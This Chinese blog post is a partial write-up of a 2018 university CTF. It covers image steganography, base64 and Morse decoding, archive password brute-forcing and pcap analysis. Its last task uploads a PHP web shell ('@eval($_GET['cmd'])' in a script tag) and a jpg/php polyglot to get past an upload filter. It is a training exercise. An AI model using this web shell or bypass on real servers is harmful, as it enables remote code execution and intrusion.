2018第一届桂林电子科技大学绿盟杯CTF(部分)
一.黑洞
题目给了这样一个黑洞图片,拿到图片首先右键看看属性
发现挺大的,可以藏一个压缩包
然后就是丢进kali虚拟机用,用binwalk查一下
发现竟然什么都没有!好吧,那下一步就是丢进010Editor里面看看。
看瞎了眼之后发现了一串字符串(在图片文件中一般都看到的是乱码,如果有一串的英文或数字什么的就要怀疑下了),那字符串就放进base64里面解密看看咯。
就这样出来了。
二.竟然有提示
同样是给了一场图片和一个txt网页,我们先看图片。
和上一题一样先右键看看属性,发现有18k,也可以藏一个压缩包了。
接着同上题一样,放在kali的虚拟机里binwalk一下,
发现这次真的有压缩包在里面,那接下俩就用kali自带的foremost命令,这个命令可以把隐藏着的包提取到output文件夹里面。
提取出来是个zip包(不会提取的话可以把图片的后缀改成rar再打开就行了,改成zip的话打开说文件已损坏,我也不知道为什么。)
这个提取出来的压缩包也有密码,他给的提示是“密码是R+3个数字”这样的话就可以用暴力**工具**了,我用的是RARmmpj(这个工具有的版本只能**rar,好像4.0就能**zip了),**出来密码是R666。
然后打开文件,是一个txt,里面有很长一段字符串(也是vm开头,看到vm开头的就丢进base64好了),放进base64里不停地解密(这里推荐一个base64解密网站,有的网站不停地解密会出错)最后解出来是.- -.. . .- ..-. . ..-. -...这样的一串,这一看就是摩斯电码啊,放到网上的在线摩斯电码网站解密,得到ADEAFEFB,再加上格式flag{ADEAFEFB}就是答案了。
三.音频分析
这次下载下来是一个音频文件,听一听,很明显的是摩斯电码的声音。
于是我想的是网上有没有听音频识别英文字母的软件,可惜没找到。
那么只能把它丢进一个音频分析软件中(我用的是audacity)
根据短的是点,长的是杠,手动翻译出摩斯密文..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- . .-. 然后又丢进刚才那个网站,得FLAGISMORSE666GUETQWER,那么flag就是flag{morse666guetqwer}
四.数据包分析
这次下载的是一个pcapng的文件,是一堆数据包让你分析,用软件Wireshark打开它。
首先全部都是绿色的,就不用过滤无效包了。那么先搜索一下关键字flag看看,
找到了这俩,jpg那肯定是图片,现在找一个图片的包
发现一堆ipod
我觉得应该是哪个flag的包告诉我应该导出哪张图可是不会看以后会看了更新
全部图片导出了之后(导出方法见这个) 发现又是一张图片;
老规矩,看大小,放binwalk看
又有压缩包 照例子foremost提取,得到zip包,里面直接就是flag了。
五.UP
界面是一个上传界面,我先上传了一个jpg图片,提示上传成功上传到了 子目录/upload/1.jpg。
因为我接触过一些题是内涵图(就是把php代码隐藏在图片中上传,达到骗过服务器的目的),所以我用cmd命令行做了一张内涵图 ,将图1.jpg和代码2.php放在同一目录下,在该目录下按住shift右键打开cmd命令行 合成代码如下。
copy 1.jpg + 1.php 2.jpg
上传了之后题目弹窗“我已将你的犯罪记录提交给网警,束手就擒吧”;
然后我又试了下直接上传php文件,弹窗“不能上传该后缀文件”;
上传含有php代码的txt文件,依然是“我已将你的犯罪记录提交给网警,束手就擒吧”;
经过以前的经验,我知道这是为了阻碍我上传php,只要把php代码上传成功再访问上传文件就可以获得flag。
这时候不知道该怎么办....直到我发现了一个1.txt文件,上面有很多flag,但一看就不是答案,但这我知道了txt上传php代码是可以执行的。
胡乱尝试后发现只要带有“<?”就会被查出来,马上想到html中执行php,随后上传txt文件内容如下
<head>
<script language="php">
@eval($_GET['cmd']);
</script>
</head>
成功绕过过滤,访问该文件获得flag。上一篇: 【pwnable.kr】flag
下一篇: 【pwnable.kr】bof